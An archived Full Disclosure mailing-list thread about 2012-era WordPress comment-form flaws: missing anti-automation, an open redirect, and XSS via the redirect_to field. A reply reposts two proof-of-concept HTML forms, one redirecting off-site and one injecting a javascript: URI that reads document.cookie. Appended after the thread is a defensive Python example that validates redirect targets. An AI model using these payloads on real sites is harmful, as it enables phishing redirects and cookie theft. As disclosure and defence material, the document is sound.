Full Disclosure mailing list archives
Re: IAA, Redirector and XSS vulnerabilities in WordPress
From: Benji <me () b3nji com>
Date: Sat, 5 May 2012 15:00:36 +0100
Wow, you're like the Jehovah's Witnesses of the internet. Stop with the childish bitching and grow up. Last time I checked intern0t was also a script kid breeding ground.

On Sat, May 5, 2012 at 2:54 PM, InterN0T Advisories <advisories () intern0t net> wrote:
> Hi List,
>
> To stop MustLive's desperate act of trying to get visitors (and more backlinks) to his website, I have, for those that don't want to go there just to see the PoCs but actually read them on this mailing list like almost _every other_ Proof of Concept / exploit, made them available below.
>
> Contents of Wordpress Redirector:
>
>     <html>
>     <head>
>     <title>WordPress Redirector exploit (lol?) (C) 2012 MustLive. [removed]</title>
>     </head>
>     <!-- <body onLoad="document.hack.submit()"> -->
>     <body>
>     <form name="hack" action="http://site/wp-comments-post.php" method="post">
>     <input type="hidden" name="author" value="Test" />
>     <input type="hidden" name="email" value="test () test test" />
>     <input type="hidden" name="comment" value="Test" />
>     <input type="hidden" name="comment_post_ID" value="1" />
>     <input type="hidden" name="redirect_to" value="http://awebsite.tld" />
>     </form>
>     </body>
>     </html>
>
> --------------------------------------
>
> Contents of Wordpress XSS:
>
>     <html>
>     <head>
>     <title>WordPress XSS exploit (lol?) (C) 2012 MustLive. [removed]</title>
>     </head>
>     <!-- <body onLoad="document.hack.submit()"> -->
>     <body>
>     <form name="hack" action="http://site/wp-comments-post.php" method="post">
>     <input type="hidden" name="author" value="Test" />
>     <input type="hidden" name="email" value="test () test test" />
>     <input type="hidden" name="comment" value="Test21" />
>     <input type="hidden" name="comment_post_ID" value="1" />
>     <input type="hidden" name="redirect_to" value="javascript:alert%28document.cookie%29//" />
>     </form>
>     </body>
>     </html>
>
> --------------------------------------
>
> I don't really have any comments about these "exploits".
>
> Best regards,
> Nemesis 3.0
>
> On Sat, 5 May 2012 16:01:53 +0300, "MustLive" <mustlive () websecurity com ua> wrote:
>
> > Hello list!
> >
> > I want to warn you about security vulnerabilities in WordPress. These are Insufficient Anti-automation, Redirector and Cross-Site Scripting vulnerabilities.
> >
> > -------------------------
> > Affected products:
> > -------------------------
> >
> > Vulnerable are WordPress 2.0 - 3.3.1.
> >
> > ----------
> > Details:
> > ----------
> >
> > Already from WP 2.0 there are Insufficient Anti-automation, Redirector and XSS vulnerabilities in wp-comments-post.php. I faced the IAA as soon as I began using WP in 2006. While the developers fixed the vulnerabilities in the previous two redirectors in WP 2.3, these vulnerabilities were not fixed even in WP 3.3.1.
> >
> > IAA (WASC-21):
> >
> > Lack of a captcha in the comment form allows automated attacks to be conducted. The developers still haven't put a captcha in the WP comment form (since the first version of the engine), which, besides IAA attacks, also allows Redirector and XSS attacks to be conducted.
> >
> > By default, premoderation is turned on in WordPress, and there is also a built-in anti-spam filter. But while 10 years ago premoderation would have been enough, this mechanism has long since ceased to be sufficient protection against spam, and the anti-spam filter had an efficiency of less than 1% (it marked only a few of the spam messages as spam). These mechanisms also don't protect against the attacks mentioned below.
> >
> > The Akismet plugin, which is "captcha-less" protection against spam, is also bundled with WP. But it's turned off by default, it's considered less effective than a captcha, and it also doesn't protect against the attacks mentioned below.
> >
> > Redirector (URL Redirector Abuse) (WASC-38):
> >
> > Exploit:
> >
> > [Removed]
> >
> > XSS (WASC-08):
> >
> > Exploit:
> >
> > [Removed]
> >
> > The XSS attack is possible in different browsers, but it's harder to conduct than in the case of the previous two redirectors (via data URI). On IIS web servers the redirect goes via the Refresh header, and on other web servers via the Location header.
> >
> > Due to nuances of how this script works (filtering of important symbols and adding of an anchor), tricky bypass methods are needed to execute JS code. This complexity exists both with a javascript URI and with the combined variant javascript URI + data URI.
> >
> > A reliable captcha protects against IAA, Redirector and XSS vulnerabilities.
> >
> > ------------
> > Timeline:
> > ------------
> >
> > 2012.04.26 - disclosed at my site
> >
> > Best wishes & regards,
> > MustLive
> > Administrator of Websecurity web site
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
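The thread above concerns a `redirect_to` form field that wp-comments-post.php forwarded into a Location (or, on IIS, Refresh) header, which is what let a crafted comment POST send the visitor off-site or to a javascript:/data: URI. The check that closes both holes is a server-side validation of the target before the header is emitted. The code below is an added example written for this archive page, not WordPress code (WordPress itself ships wp_safe_redirect() and wp_validate_redirect() for this purpose); the site host `site`, the fallback path and the sample inputs are constructed for the example, modelled on the PoC values posted in the thread.

```python
"""Validating a user-controlled redirect target before emitting it.

Added example, not WordPress code: a language-neutral illustration of the
server-side check that stops a ``redirect_to``-style parameter from being
turned into an off-site redirect or a javascript:/data: URI. The site
host and sample values are constructed for the example.
"""
from urllib.parse import urlsplit, unquote

ALLOWED_SCHEMES = {"http", "https"}


def validate_redirect(raw: str, site_host: str, fallback: str = "/") -> str:
    """Return ``raw`` if it is a safe same-site target, otherwise ``fallback``.

    Rejected:
      * any scheme other than http/https (javascript:, data:, ...), including
        when the colon arrives percent-encoded as %3A;
      * an authority that is not exactly ``site_host`` (covers other hosts,
        userinfo@ tricks and unexpected ports);
      * protocol-relative forms (//host, ///host) that browsers resolve to
        another host even though urlsplit() reports an empty netloc;
      * backslashes and control characters, which some browsers treat as
        slashes and which would otherwise allow header injection.
    """
    target = (raw or "").strip()
    if not target:
        return fallback
    # Inspect both the raw string and its percent-decoded form so that an
    # encoded scheme separator cannot hide a forbidden scheme.
    for candidate in (target, unquote(target)):
        if any(ord(ch) < 0x20 or ch == "\x7f" for ch in candidate):
            return fallback
        if "\\" in candidate:
            return fallback
        if candidate.startswith("//"):
            return fallback
        try:
            parts = urlsplit(candidate)
        except ValueError:  # e.g. malformed IPv6 literal in the authority
            return fallback
        scheme = parts.scheme.lower()
        netloc = parts.netloc.lower()
        if scheme and scheme not in ALLOWED_SCHEMES:
            return fallback
        if scheme and not netloc:  # "http:other.tld" style, no authority
            return fallback
        if netloc and netloc != site_host.lower():
            return fallback
    return target


if __name__ == "__main__":
    # Constructed inputs modelled on the values posted in the thread.
    SITE = "site"
    for value in (
        "http://awebsite.tld",                      # off-site redirect
        "javascript:alert%28document.cookie%29//",  # script URI
        "//other.tld/",                             # protocol-relative
        "http://site/?p=1#comment-7",               # legitimate, absolute
        "/?p=1#comments",                           # legitimate, relative
    ):
        print(f"{value!r:45} -> {validate_redirect(value, SITE)!r}")
```

The design choice worth noting is that the function never tries to "clean" a bad value; anything that fails a check is replaced by the fallback, so filtering tricks of the kind the advisory mentions (encoded separators, data-URI combinations) have nothing to work against. The captcha that the advisory asks for addresses the anti-automation part separately and does not replace this check.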